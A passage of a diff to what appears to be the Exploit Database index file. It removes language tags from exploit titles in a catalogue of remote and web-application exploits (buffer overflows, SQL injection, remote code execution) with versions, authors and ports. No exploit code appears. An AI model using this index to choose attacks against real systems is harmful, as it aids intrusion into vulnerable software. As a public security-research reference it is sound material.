Overflow (Perl)",2007-12-18,"Marcin Kozlowski",remote,windows_x86,3128 +4754,exploits/windows_x86/remote/4754.pl,"3proxy 0.5.3g (Windows x86) - 'logurl()' Remote Buffer Overflow",2007-12-18,"Marcin Kozlowski",remote,windows_x86,3128 4760,exploits/windows/remote/4760.txt,"Microsoft Windows Server 2000 SP4 (Advanced Server) - Message Queue (MS07-065)",2007-12-21,"Andres Tarasco",remote,windows, 4761,exploits/multiple/remote/4761.pl,"Sendmail with clamav-milter < 0.91.2 - Remote Command Execution",2007-12-21,eliteboy,remote,multiple,25 4784,exploits/windows/remote/4784.pl,"BadBlue 2.72 - PassThru Remote Buffer Overflow",2007-12-24,"Jacopo Cervini",remote,windows,80 @@ -12198,12 +12198,12 @@ id,file,description,date,author,type,platform,port 5563,exploits/windows/remote/5563.pl,"TFTP Server for Windows 1.4 - ST Remote BSS Overflow",2008-05-08,tixxDZ,remote,windows,69 5612,exploits/windows/remote/5612.html,"idautomation bar code - ActiveX Multiple Vulnerabilities",2008-05-14,shinnai,remote,windows, 5619,exploits/windows/remote/5619.html,"Microsoft Internet Explorer - Print Table of Links Cross-Zone Scripting",2008-05-14,"Aviv Raff",remote,windows, -5622,exploits/linux/remote/5622.txt,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Perl)",2008-05-15,"Markus Mueller",remote,linux,22 +5622,exploits/linux/remote/5622.txt,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH",2008-05-15,"Markus Mueller",remote,linux,22 5632,exploits/linux/remote/5632.rb,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Ruby)",2008-05-16,L4teral,remote,linux,22 5681,exploits/windows/remote/5681.html,"Creative Software AutoUpdate Engine - ActiveX Stack Overflow",2008-05-27,BitKrush,remote,windows, 5694,exploits/windows/remote/5694.cpp,"ASUS DPC Proxy 2.0.0.16/19 - Remote Buffer Overflow",2008-05-29,Heretic2,remote,windows,623 5695,exploits/windows/remote/5695.cpp,"Now SMS/Mms Gateway 5.5 - Remote Buffer Overflow",2008-05-29,Heretic2,remote,windows,8800 -5720,exploits/linux/remote/5720.py,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH (Python)",2008-06-01,"WarCat team",remote,linux,22 +5720,exploits/linux/remote/5720.py,"OpenSSL 0.9.8c-1 < 0.9.8g-9 (Debian and Derivatives) - Predictable PRNG Brute Force SSH",2008-06-01,"WarCat team",remote,linux,22 5732,exploits/windows/remote/5732.html,"C6 Messenger - ActiveX Remote Download and Execute",2008-06-03,Nine:Situations:Group,remote,windows, 5738,exploits/windows/remote/5738.rb,"HP StorageWorks - NSI Double Take Remote Overflow (Metasploit)",2008-06-04,ri0t,remote,windows,1100 5741,exploits/windows/remote/5741.html,"Akamai Download Manager < 2.2.3.7 - ActiveX Remote Download",2008-06-04,cocoruder,remote,windows, @@ -12221,15 +12221,15 @@ id,file,description,date,author,type,platform,port 6004,exploits/windows/remote/6004.txt,"Panda Security ActiveScan 2.0 (Update) - Remote Buffer Overflow",2008-07-04,"Karol Wiesek",remote,windows, 6012,exploits/windows/remote/6012.php,"Youngzsoft CMailServer 5.4.6 - 'CMailCOM.dll' Remote Overwrite (SEH)",2008-07-06,Nine:Situations:Group,remote,windows,80 6013,exploits/osx/remote/6013.pl,"Apple Safari / QuickTime 7.3 - RTSP Content-Type Remote Buffer Overflow",2008-07-06,krafty,remote,osx, -6045,exploits/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution (Python)",2008-07-12,muts,remote,linux,80 +6045,exploits/linux/remote/6045.py,"Fonality trixbox 2.6.1 - 'langChoice' Remote Code Execution",2008-07-12,muts,remote,linux,80 6089,exploits/windows/remote/6089.pl,"Bea Weblogic Apache Connector - Code Execution / Denial of Service",2008-07-17,kingcope,remote,windows,80 6094,exploits/linux/remote/6094.txt,"Debian OpenSSH - (Authenticated) Remote SELinux Privilege Escalation",2008-07-17,eliteboy,remote,linux, 6100,exploits/windows_x86/remote/6100.py,"Apache mod_jk 1.2.19 (Windows x86) - Remote Buffer Overflow",2008-07-18,Unohope,remote,windows_x86,80 6116,exploits/windows/remote/6116.pl,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-22,"Guido Landi",remote,windows, 6118,exploits/windows/remote/6118.pl,"IntelliTamper 2.07 - server header Remote Code Execution",2008-07-22,Koshi,remote,windows, -6121,exploits/windows/remote/6121.c,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow (C)",2008-07-23,r0ut3r,remote,windows, +6121,exploits/windows/remote/6121.c,"IntelliTamper 2.0.7 - HTML Parser Remote Buffer Overflow",2008-07-23,r0ut3r,remote,windows, 6122,exploits/multiple/remote/6122.rb,"BIND 9.4.1 < 9.4.2 - Remote DNS Cache Poisoning (Metasploit)",2008-07-23,I)ruid,remote,multiple, -6123,exploits/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning (Python)",2008-07-24,"Julien Desfossez",remote,multiple, +6123,exploits/multiple/remote/6123.py,"BIND 9.x - Remote DNS Cache Poisoning",2008-07-24,"Julien Desfossez",remote,multiple, 6124,exploits/windows/remote/6124.c,"Microsoft Access - 'Snapview.ocx 10.0.5529.0' ActiveX Remote File Download",2008-07-24,callAX,remote,windows, 6130,exploits/multiple/remote/6130.c,"BIND 9.x - Remote DNS Cache Poisoning",2008-07-25,"Marc Bevand",remote,multiple, 6151,exploits/windows/remote/6151.txt,"Velocity Web-Server 1.0 - Directory Traversal",2008-07-28,DSecRG,remote,windows, @@ -12376,7 +12376,7 @@ id,file,description,date,author,type,platform,port 8041,exploits/windows/remote/8041.txt,"GeoVision Digital Video Surveillance System 8.2 - Arbitrary File Disclosure",2009-02-11,"Dejan Levaja",remote,windows, 8059,exploits/windows/remote/8059.html,"GeoVision LiveX 8200 - ActiveX 'LIVEX_~1.OCX' File Corruption",2009-02-16,Nine:Situations:Group,remote,windows, 8079,exploits/windows/remote/8079.html,"Microsoft Internet Explorer 7 (Windows XP SP2) - Memory Corruption (MS09-002)",2009-02-20,Abysssec,remote,windows, -8080,exploits/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002) (Python)",2009-02-20,"David Kennedy (ReL1K)",remote,windows, +8080,exploits/windows/remote/8080.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-02-20,"David Kennedy (ReL1K)",remote,windows, 8082,exploits/windows/remote/8082.html,"Microsoft Internet Explorer 7 (Windows 2003 SP2) - Memory Corruption (MS09-002)",2009-02-20,webDEViL,remote,windows, 8096,exploits/hardware/remote/8096.txt,"Optus/Huawei E960 HSDPA Router - Sms Cross-Site Scripting",2009-02-23,"Rizki Wicaksono",remote,hardware, 8097,exploits/multiple/remote/8097.txt,"MLdonkey 2.9.7 - Arbitrary File Disclosure",2009-02-23,"Michael Peselnik",remote,multiple, @@ -12387,7 +12387,7 @@ id,file,description,date,author,type,platform,port 8144,exploits/windows/remote/8144.txt,"Imera ImeraIEPlugin - ActiveX Control Remote Code Execution",2009-03-03,Elazar,remote,windows, 8149,exploits/windows/remote/8149.txt,"EFS Easy Chat Server 2.2 - Cross-Site Request Forgery (Change Admin Password)",2009-03-03,Stack,remote,windows, 8152,exploits/windows/remote/8152.py,"Microsoft Internet Explorer 7 - Memory Corruption (MS09-002)",2009-03-04,"Ahmed Obied",remote,windows, -8154,exploits/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow (Perl)",2009-03-04,Dr4sH,remote,windows,80 +8154,exploits/windows/remote/8154.pl,"EFS Easy Chat Server 2.2 - Authentication Request Buffer Overflow",2009-03-04,Dr4sH,remote,windows,80 8155,exploits/windows/remote/8155.txt,"Easy File Sharing Web Server 4.8 - File Disclosure",2009-03-04,Stack,remote,windows, 8160,exploits/windows/remote/8160.html,"SupportSoft DNA Editor Module - 'dnaedit.dll' Code Execution",2009-03-05,Nine:Situations:Group,remote,windows, 8173,exploits/windows/remote/8173.txt,"Belkin BullDog Plus - UPS-Service Buffer Overflow",2009-03-09,Elazar,remote,windows, @@ -12456,7 +12456,7 @@ id,file,description,date,author,type,platform,port 8754,exploits/windows/remote/8754.patch,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (Patch)",2009-05-21,"Ron Bowes/Andrew Orr",remote,windows, 8757,exploits/windows/remote/8757.html,"BaoFeng - 'config.dll' ActiveX Remote Code Execution",2009-05-21,etirah,remote,windows, 8758,exploits/windows/remote/8758.html,"ChinaGames - 'CGAgent.dll' ActiveX Remote Code Execution",2009-05-21,etirah,remote,windows, -8765,exploits/windows/remote/8765.php,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (PHP)",2009-05-22,racle,remote,windows, +8765,exploits/windows/remote/8765.php,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass",2009-05-22,racle,remote,windows, 8786,exploits/multiple/remote/8786.txt,"Lighttpd < 1.4.23 (BSD/Solaris) - Source Code Disclosure",2009-05-26,venatir,remote,multiple, 8804,exploits/windows/remote/8804.py,"Soulseek 157 NS - Remote Buffer Overflow (SEH)",2009-05-26,His0k4,remote,windows,2242 8806,exploits/windows/remote/8806.pl,"Microsoft IIS 6.0 - WebDAV Remote Authentication Bypass (2)",2009-05-26,ka0x,remote,windows, @@ -12662,7 +12662,7 @@ id,file,description,date,author,type,platform,port 10973,exploits/windows/remote/10973.py,"BigAnt Server 2.52 - Remote Buffer Overflow (2)",2010-01-03,DouBle_Zer0,remote,windows, 10980,exploits/linux/remote/10980.txt,"Skype for Linux 2.1 Beta - Multiple Strange Behaviour Vulnerabilities",2010-01-04,emgent,remote,linux, 11022,exploits/novell/remote/11022.pl,"Novell eDirectory 8.8 SP5 - (Authenticated) Remote Buffer Overflow",2010-01-06,"His0k4 & Simo36",remote,novell, -11027,exploits/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow (Perl)",2010-01-06,jacky,remote,windows, +11027,exploits/windows/remote/11027.pl,"Apple QuickTime 7.2/7.3 - RTSP Buffer Overflow",2010-01-06,jacky,remote,windows, 11059,exploits/windows/remote/11059.html,"JcomBand toolbar on IE - ActiveX Buffer Overflow",2010-01-07,"germaya_x & D3V!L FUCKER",remote,windows, 11138,exploits/windows/remote/11138.c,"Apple iTunes 8.1.x - 'daap' Remote Buffer Overflow",2010-01-14,Simo36,remote,windows, 11151,exploits/windows/remote/11151.html,"Microsoft Internet Explorer - 'wshom.ocx' ActiveX Control Remote Code Execution",2010-01-16,"germaya_x & D3V!L FUCKER",remote,windows, @@ -17268,7 +17268,7 @@ id,file,description,date,author,type,platform,port 37400,exploits/windows/remote/37400.php,"Havij - OLE Automation Array Remote Code Execution",2015-06-27,"Mohammad Reza Espargham",remote,windows, 37429,exploits/hardware/remote/37429.txt,"Juniper Networks Mobility System Software - '/aaa/wba_login.html' Cross-Site Scripting",2012-06-14,"Craig Lambert",remote,hardware, 37405,exploits/hardware/remote/37405.py,"Edimax IC-3030iWn - UDP Packet Password Information Disclosure",2012-06-14,y3dips,remote,hardware, -37426,exploits/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection (Python)",2015-06-29,"Ben Lincoln",remote,cgi, +37426,exploits/cgi/remote/37426.py,"Endian Firewall < 3.0.0 - OS Command Injection",2015-06-29,"Ben Lincoln",remote,cgi, 37428,exploits/cgi/remote/37428.txt,"Endian Firewall < 3.0.0 - OS Command Injection (Metasploit)",2015-06-29,"Ben Lincoln",remote,cgi, 37564,exploits/hardware/remote/37564.txt,"Barracuda Email Security Service - Multiple HTML Injection Vulnerabilities",2012-08-02,"Benjamin Kunz Mejri",remote,hardware, 37448,exploits/multiple/remote/37448.rb,"Adobe Flash Player - Drawing Fill Shader Memory Corruption (Metasploit)",2015-06-30,Metasploit,remote,multiple, @@ -18402,8 +18402,8 @@ id,file,description,date,author,type,platform,port 737,exploits/php/webapps/737.txt,"QwikiWiki - Directory Traversal",2005-01-04,Madelman,webapps,php, 740,exploits/php/webapps/740.pl,"phpBB 2.0.10 - 'ssh.D.Worm' Bot Install Altavista",2005-01-04,"Severino Honorato",webapps,php, 754,exploits/php/webapps/754.pl,"ITA Forum 1.49 - SQL Injection",2005-01-13,RusH,webapps,php, -772,exploits/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (C)",2005-01-25,THUNDER,webapps,cgi, -773,exploits/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution (Perl)",2005-01-25,GHC,webapps,cgi, +772,exploits/cgi/webapps/772.c,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution",2005-01-25,THUNDER,webapps,cgi, +773,exploits/cgi/webapps/773.pl,"AWStats 6.0 < 6.2 - 'configdir' Remote Command Execution",2005-01-25,GHC,webapps,cgi, 774,exploits/php/webapps/774.pl,"Siteman 1.1.10 - Remote Administrative Account Addition",2005-01-25,"Noam Rathaus",webapps,php, 786,exploits/php/webapps/786.pl,"LiteForum 2.1.1 - SQL Injection",2005-02-04,RusH,webapps,php, 790,exploits/cgi/webapps/790.pl,"PerlDesk 1.x - SQL Injection",2005-02-05,deluxe89,webapps,cgi, @@ -18432,7 +18432,7 @@ id,file,description,date,author,type,platform,port 881,exploits/php/webapps/881.txt,"ZPanel 2.5 - SQL Injection",2005-03-15,Mikhail,webapps,php, 889,exploits/php/webapps/889.pl,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-21,Kutas,webapps,php, 892,exploits/php/webapps/892.txt,"phpMyFamily 1.4.0 - Authentication Bypass",2005-03-21,kre0n,webapps,php, -897,exploits/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass (C)",2005-03-24,str0ke,webapps,php, +897,exploits/php/webapps/897.cpp,"phpBB 2.0.12 - Change User Rights Authentication Bypass",2005-03-24,str0ke,webapps,php, 901,exploits/php/webapps/901.pl,"PunBB 1.2.2 - Authentication Bypass",2005-03-29,RusH,webapps,php, 907,exploits/php/webapps/907.pl,"phpBB 2.0.13 - 'downloads.php' mod Get Hash",2005-04-02,CereBrums,webapps,php, 910,exploits/php/webapps/910.pl,"phpBB 2.0.13 - 'Calendar Pro' mod Get Hash",2005-04-04,CereBrums,webapps,php, @@ -18452,13 +18452,13 @@ id,file,description,date,author,type,platform,port 1004,exploits/cgi/webapps/1004.php,"WebAPP 0.9.9.2.1 - Remote Command Execution (2)",2005-05-20,Nikyt0x,webapps,cgi, 1005,exploits/cgi/webapps/1005.pl,"WebAPP 0.9.9.2.1 - Remote Command Execution (1)",2005-05-20,Alpha_Programmer,webapps,cgi, 1006,exploits/php/webapps/1006.pl,"Woltlab Burning Board 2.3.1 - 'register.php' SQL Injection",2005-05-20,deluxe89,webapps,php, -1010,exploits/asp/webapps/1010.pl,"Maxwebportal 1.36 - 'Password.asp' Change Password (3) (Perl)",2005-05-26,Alpha_Programmer,webapps,asp, -1011,exploits/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password (2) (PHP)",2005-05-26,mh_p0rtal,webapps,asp, +1010,exploits/asp/webapps/1010.pl,"Maxwebportal 1.36 - 'Password.asp' Change Password (3)",2005-05-26,Alpha_Programmer,webapps,asp, +1011,exploits/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password (2)",2005-05-26,mh_p0rtal,webapps,asp, 1012,exploits/asp/webapps/1012.txt,"Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)",2005-05-26,"Soroush Dalili",webapps,asp, 1013,exploits/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",webapps,php, 1014,exploits/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)",2005-05-27,"Danica Jones",webapps,php, 1015,exploits/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - User Registration (3)",2005-05-27,"Soroush Dalili",webapps,asp, -1016,exploits/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass (Perl)",2005-05-30,Alpha_Programmer,webapps,php, +1016,exploits/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass",2005-05-30,Alpha_Programmer,webapps,php, 1017,exploits/php/webapps/1017.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (1)",2005-05-30,mh_p0rtal,webapps,php, 1018,exploits/php/webapps/1018.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (2)",2005-05-30,Nikyt0x,webapps,php, 1020,exploits/php/webapps/1020.c,"ZeroBoard 4.1 - 'preg_replace' Remote Nobody Shell",2005-05-31,n0gada,webapps,php, @@ -18558,7 +18558,7 @@ id,file,description,date,author,type,platform,port 1356,exploits/php/webapps/1356.php,"DoceboLms 2.0.4 - 'connector.php' Arbitrary File Upload",2005-12-04,rgod,webapps,php, 1358,exploits/php/webapps/1358.php,"SimpleBBS 1.1 - Remote Command Execution",2005-12-06,rgod,webapps,php, 1359,exploits/php/webapps/1359.php,"SugarSuite Open Source 4.0beta - Remote Code Execution (1)",2005-12-07,rgod,webapps,php, -1361,exploits/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Command Execution (C)",2005-12-07,unitedasia,webapps,php, +1361,exploits/php/webapps/1361.c,"SimpleBBS 1.1 - Remote Command Execution",2005-12-07,unitedasia,webapps,php, 1363,exploits/php/webapps/1363.php,"Website Baker 2.6.0 - Authentication Bypass / Remote Code Execution",2005-12-08,rgod,webapps,php, 1364,exploits/php/webapps/1364.c,"SugarSuite Open Source 4.0beta - Remote Code Execution (2)",2005-12-08,pointslash,webapps,php, 1367,exploits/php/webapps/1367.php,"Flatnuke 2.5.6 - Privilege Escalation / Remote Command Execution",2005-12-10,rgod,webapps,php, @@ -18875,8 +18875,8 @@ id,file,description,date,author,type,platform,port 1933,exploits/php/webapps/1933.txt,"BandSite CMS 1.1.1 - 'ROOT_PATH' Remote File Inclusion",2006-06-20,Kw3[R]Ln,webapps,php, 1934,exploits/php/webapps/1934.txt,"dotProject 2.0.3 - 'baseDir' Remote File Inclusion",2006-06-20,h4ntu,webapps,php, 1936,exploits/php/webapps/1936.txt,"SmartSite CMS 1.0 - 'root' Remote File Inclusion",2006-06-20,Archit3ct,webapps,php, -1938,exploits/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection (Perl)",2006-06-21,RusH,webapps,php, -1939,exploits/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection (PHP)",2006-06-21,RusH,webapps,php, +1938,exploits/php/webapps/1938.pl,"DataLife Engine 4.1 - SQL Injection",2006-06-21,RusH,webapps,php, +1939,exploits/php/webapps/1939.php,"DataLife Engine 4.1 - SQL Injection",2006-06-21,RusH,webapps,php, 1941,exploits/php/webapps/1941.php,"Mambo 4.6rc1 - Weblinks Blind SQL Injection (2)",2006-06-22,rgod,webapps,php, 1942,exploits/php/webapps/1942.txt,"ralf image Gallery 0.7.4 - Multiple Vulnerabilities",2006-06-22,Aesthetico,webapps,php, 1943,exploits/php/webapps/1943.txt,"Harpia CMS 1.0.5 - Remote File Inclusion",2006-06-22,Kw3[R]Ln,webapps,php, @@ -19331,7 +19331,7 @@ id,file,description,date,author,type,platform,port 2551,exploits/php/webapps/2551.txt,"phpBB ACP User Registration Mod 1.0 - Remote File Inclusion",2006-10-13,bd0rk,webapps,php, 2552,exploits/php/webapps/2552.pl,"phpBB Security 1.0.1 - 'PHP_security.php' Remote File Inclusion",2006-10-13,"Nima Salehi",webapps,php, 2553,exploits/php/webapps/2553.txt,"YaBBSM 3.0.0 - 'Offline.php' Remote File Inclusion",2006-10-13,SilenZ,webapps,php, -2554,exploits/php/webapps/2554.php,"cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation (PHP)",2006-10-13,"Nima Salehi",webapps,php, +2554,exploits/php/webapps/2554.php,"cPanel 10.8.x - 'cpwrap' via MySQLAdmin Privilege Escalation",2006-10-13,"Nima Salehi",webapps,php, 2555,exploits/php/webapps/2555.txt,"CentiPaid 1.4.2 - 'centipaid_class.php' Remote File Inclusion",2006-10-14,Kw3[R]Ln,webapps,php, 2556,exploits/php/webapps/2556.txt,"E-Uploader Pro 1.0 - Image Upload / Code Execution",2006-10-14,Kacper,webapps,php, 2557,exploits/php/webapps/2557.txt,"IncCMS Core 1.0.0 - 'settings.php' Remote File Inclusion",2006-10-14,Kacper,webapps,php, @@ -21734,8 +21734,8 @@ id,file,description,date,author,type,platform,port 6049,exploits/php/webapps/6049.txt,"Maian Gallery 2.0 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php, 6050,exploits/php/webapps/6050.txt,"Maian Greetings 2.1 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php, 6051,exploits/php/webapps/6051.txt,"Maian Music 1.0 - Insecure Cookie Handling",2008-07-12,Saime,webapps,php, -6053,exploits/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (PHP)",2008-07-12,"Inphex & real",webapps,php, -6054,exploits/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution (Perl)",2008-07-12,"Inphex & real",webapps,php, +6053,exploits/php/webapps/6053.php,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution",2008-07-12,"Inphex & real",webapps,php, +6054,exploits/php/webapps/6054.pl,"Fuzzylime CMS 3.01 - 'poll' Remote Code Execution",2008-07-12,"Inphex & real",webapps,php, 6055,exploits/php/webapps/6055.pl,"Joomla! Component n-forms 1.01 - Blind SQL Injection",2008-07-12,"The Moorish",webapps,php, 6056,exploits/php/webapps/6056.txt,"WebCMS Portal Edition - 'id' SQL Injection",2008-07-12,Mr.SQL,webapps,php, 6057,exploits/php/webapps/6057.txt,"jsite 1.0 oe - SQL Injection / Local File Inclusion",2008-07-12,S.W.A.T.,webapps,php, @@ -23482,7 +23482,7 @@ id,file,description,date,author,type,platform,port 8555,exploits/php/webapps/8555.txt,"ABC Advertise 1.0 - Admin Password Disclosure",2009-04-27,SirGod,webapps,php, 8557,exploits/php/webapps/8557.html,"VisionLms 1.0 - 'changePW.php' Remote Password Change",2009-04-28,Mr.tro0oqy,webapps,php, 8558,exploits/php/webapps/8558.txt,"MIM: InfiniX 1.2.003 - Multiple SQL Injections",2009-04-28,YEnH4ckEr,webapps,php, -8559,exploits/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure (C)",2009-04-28,StAkeR,webapps,php, +8559,exploits/php/webapps/8559.c,"webSPELL 4.2.0d (Linux) - Local File Disclosure",2009-04-28,StAkeR,webapps,php, 8563,exploits/php/webapps/8563.txt,"eLitius 1.0 - 'banner-details.php?id' SQL Injection",2009-04-29,snakespc,webapps,php, 8565,exploits/php/webapps/8565.txt,"ProjectCMS 1.0b - 'index.php?sn' SQL Injection",2009-04-29,YEnH4ckEr,webapps,php, 8566,exploits/php/webapps/8566.txt,"S-CMS 1.1 Stable - 'page' Local File Inclusion",2009-04-29,ZoRLu,webapps,php, @@ -36088,7 +36088,7 @@ id,file,description,date,author,type,platform,port 34518,exploits/jsp/webapps/34518.txt,"ManageEngine Desktop Central - Arbitrary File Upload / Remote Code Execution",2014-09-01,"Pedro Ribeiro",webapps,jsp, 34519,exploits/jsp/webapps/34519.txt,"ManageEngine EventLog Analyzer - Multiple Vulnerabilities (1)",2014-09-01,"Hans-Martin Muench",webapps,jsp,8400 34524,exploits/php/webapps/34524.txt,"WordPress Plugin Huge-IT Image Gallery 1.0.1 - (Authenticated) SQL Injection",2014-09-02,"Claudio Viviani",webapps,php,80 -34525,exploits/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting (Python)",2014-09-02,"Dolev Farhi",webapps,multiple, +34525,exploits/multiple/webapps/34525.txt,"Syslog LogAnalyzer 3.6.5 - Persistent Cross-Site Scripting",2014-09-02,"Dolev Farhi",webapps,multiple, 34637,exploits/php/webapps/34637.txt,"Joomla! Component com_formmaker 3.4 - SQL Injection",2014-09-12,"Claudio Viviani",webapps,php, 34684,exploits/php/webapps/34684.pl,"Joomla! Component com_spain - 'nv' SQL Injection",2010-09-20,FL0RiX,webapps,php, 34531,exploits/php/webapps/34531.txt,"BlastChat Client 3.3 - Cross-Site Scripting",2010-08-25,"Aung Khant",webapps,php, @@ -36206,7 +36206,7 @@ id,file,description,date,author,type,platform,port 34678,exploits/php/webapps/34678.txt,"WebStatCaffe - '/stat/pageviewerschart.php?date' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, 34679,exploits/php/webapps/34679.txt,"WebStatCaffe - '/stat/referer.php?date' Cross-Site Scripting",2009-08-29,Moudi,webapps,php, 34680,exploits/hardware/webapps/34680.txt,"ZTE ZXDSL-931VII - Configuration Dump",2014-09-16,"L0ukanik0-s S0kniaku0l",webapps,hardware, -34681,exploits/php/webapps/34681.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload (Python)",2014-09-16,"Claudio Viviani",webapps,php, +34681,exploits/php/webapps/34681.txt,"WordPress Plugin Slideshow Gallery 1.4.6 - Arbitrary File Upload",2014-09-16,"Claudio Viviani",webapps,php, 34682,exploits/ios/webapps/34682.txt,"USB&WiFi Flash Drive 1.3 iOS - Code Execution",2014-09-16,Vulnerability-Lab,webapps,ios,8080 34687,exploits/asp/webapps/34687.txt,"Smart ASP Survey - 'catid' SQL Injection",2009-08-27,Moudi,webapps,asp, 34688,exploits/php/webapps/34688.txt,"Basilic 1.5.13 - 'index.php' Cross-Site Scripting",2009-07-27,PLATEN,webapps,php, @@ -39613,13 +39613,13 @@ id,file,description,date,author,type,platform,port 43882,exploits/asp/webapps/43882.rb,"Kaseya Virtual System Administrator (VSA) 7.0 < 9.1 - (Authenticated) Arbitrary File Upload",2015-09-28,"Pedro Ribeiro",webapps,asp, 40961,exploits/multiple/webapps/40961.py,"Apache mod_session_crypto - Padding Oracle",2016-12-23,"RedTeam Pentesting GmbH",webapps,multiple, 40966,exploits/php/webapps/40966.txt,"Joomla! Component Blog Calendar - SQL Injection",2016-12-26,X-Cisadane,webapps,php, -40968,exploits/php/webapps/40968.sh,"PHPMailer < 5.2.18 - Remote Code Execution (Bash)",2016-12-26,"Dawid Golunski",webapps,php, -40970,exploits/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution (PHP)",2016-12-25,"Dawid Golunski",webapps,php, +40968,exploits/php/webapps/40968.sh,"PHPMailer < 5.2.18 - Remote Code Execution",2016-12-26,"Dawid Golunski",webapps,php, +40970,exploits/php/webapps/40970.php,"PHPMailer < 5.2.18 - Remote Code Execution",2016-12-25,"Dawid Golunski",webapps,php, 40969,exploits/php/webapps/40969.pl,"PHPMailer < 5.2.20 - Remote Code Execution",2016-12-27,"Dawid Golunski",webapps,php, 40971,exploits/php/webapps/40971.txt,"WordPress Plugin Simply Poll 1.4.1 - SQL Injection",2016-12-28,"TAD GROUP",webapps,php, 40972,exploits/php/webapps/40972.php,"SwiftMailer < 5.4.5-DEV - Remote Code Execution",2016-12-28,"Dawid Golunski",webapps,php, 40973,exploits/php/webapps/40973.txt,"Joomla! Component aWeb Cart Watching System for Virtuemart 2.6.0 - SQL Injection",2016-12-28,qemm,webapps,php, -40974,exploits/php/webapps/40974.py,"PHPMailer < 5.2.18 - Remote Code Execution (Python)",2016-12-29,anarc0der,webapps,php, +40974,exploits/php/webapps/40974.py,"PHPMailer < 5.2.18 - Remote Code Execution",2016-12-29,anarc0der,webapps,php, 40976,exploits/php/webapps/40976.txt,"WordPress Plugin Slider Templatic Tevolution < 2.3.6 - Arbitrary File Upload",2016-12-29,r3m1ck,webapps,php, 40977,exploits/hardware/webapps/40977.txt,"Dell SonicWALL Global Management System GMS 8.1 - Blind SQL Injection",2016-12-29,LiquidWorm,webapps,hardware, 40978,exploits/hardware/webapps/40978.txt,"Dell SonicWALL Secure Mobile Access SMA 8.1 - Cross-Site Scripting / Cross-Site Request Forgery",2016-12-29,LiquidWorm,webapps,hardware, @@ -39782,7 +39782,7 @@ id,file,description,date,author,type,platform,port 41208,exploits/hardware/webapps/41208.txt,"Netman 204 - Backdoor Account / Password Reset",2017-01-31,"Simon Gurney",webapps,hardware, 41209,exploits/php/webapps/41209.txt,"Joomla! Component JTAG Calendar 6.2.4 - 'search' SQL Injection",2017-01-28,"Persian Hack Team",webapps,php, 41210,exploits/php/webapps/41210.txt,"LogoStore - 'query' SQL Injection",2017-02-01,"Kaan KAMIS",webapps,php, -41223,exploits/linux/webapps/41223.py,"WordPress Core 4.7.0/4.7.1 - Content Injection (Python)",2017-02-02,leonjza,webapps,linux, +41223,exploits/linux/webapps/41223.py,"WordPress Core 4.7.0/4.7.1 - Content Injection",2017-02-02,leonjza,webapps,linux, 41224,exploits/linux/webapps/41224.rb,"WordPress Core 4.7.0/4.7.1 - Content Injection (Ruby)",2017-02-02,"Harsh Jaiswal",webapps,linux, 41231,exploits/php/webapps/41231.txt,"Itech Travel Portal Script 9.35 - SQL Injection",2017-02-02,"Ihsan Sencan",webapps,php, 41225,exploits/php/webapps/41225.txt,"Property Listing Script - 'propid' Blind SQL Injection",2017-02-02,"Kaan KAMIS",webapps,php, @@ -43319,7 +43319,6 @@ id,file,description,date,author,type,platform,port 48714,exploits/php/webapps/48714.txt,"pfSense 2.4.4-p3 - Cross-Site Request Forgery",2020-07-26,ghost_fh,webapps,php, 48715,exploits/php/webapps/48715.txt,"Virtual Airlines Manager 2.6.2 - Persistent Cross-Site 